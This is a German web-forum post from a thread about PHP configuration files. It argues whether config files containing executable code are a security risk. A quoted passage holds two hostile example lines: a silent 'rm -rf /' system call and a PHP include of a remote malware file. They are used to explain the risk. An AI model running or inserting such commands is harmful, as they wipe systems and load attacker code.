Sven Rautenberg: Konfigurationsdatei

Beitrag lesen

SELF-Forum

Konfigurationsdatei

Sven Rautenberg Homepage des Autors
Informationen zu den Bewertungsregeln

Moin!

Den riesigen Nachteil von Programmcode in einer Konfigurationsdatei für eine Scriptsprache hast Du vergessen:

Der Programmcode in der Konfigurationsdatei wird gnadenlos ausgeführt. Auch Dinge wie system("rm -rf / > /dev/null 2> /dev/null &") oder include 'http://www.example.com/eviljoe/malware.php.txt'.

Natürlich muß so etwas erst einmal in die Konfigurationsdatei rein. Aber dafür reicht eine kleine Lücke, die Schreibzugriffe auf die Datei erlaubt. Danach hat ein Angreifer volle Kontrolle über PHP.

Ok, das ist grundsätzlich natürlich richtig, andererseits: Wie wahrscheinlich ist es? Und wie unwahrscheinlich ist es in diesem Fall dann, dass der Angreifer NUR die PHP-Konfigurationsdatei verändern kann, und nicht alle anderen Dateien mit PHP-Code auch?

Denn wenn er außerdem auch jede andere Datei ändern kann, ist das ja kein Nachteil der Konfigurationsdatei an sich. Und auch generell würde ich meinen, dass das kein Nachteil ist, denn die Absicherung einer Applikation gegen unautorisierte Manipulationen muss ja sowieso gemacht werden.

- Sven Rautenberg

Beitrag melden
Informationen zu den Bewertungsregeln
0 21

Konfigurationsdatei

Akrisios
  • programmiertechnik
  1. 0
    dedlfix
  2. 0
    hotti
    1. 0
      Akrisios
      1. 0
        hotti
        1. 0
          dedlfix
          1. 0
            hotti
            1. 2
              dedlfix
  3. 1
    Sven Rautenberg
    1. 0
      Baba
      1. 0
        Der Martin
        1. 0
          Baba
          1. 0
            dedlfix
            1. 0
              Baba
              1. 1
                dedlfix
                1. 0
                  Baba
      2. 0
        Sven Rautenberg
    2. 0
      Akrisios
    3. 1
      Alexander (HH)
      1. 0
        dedlfix
      2. 0
        Sven Rautenberg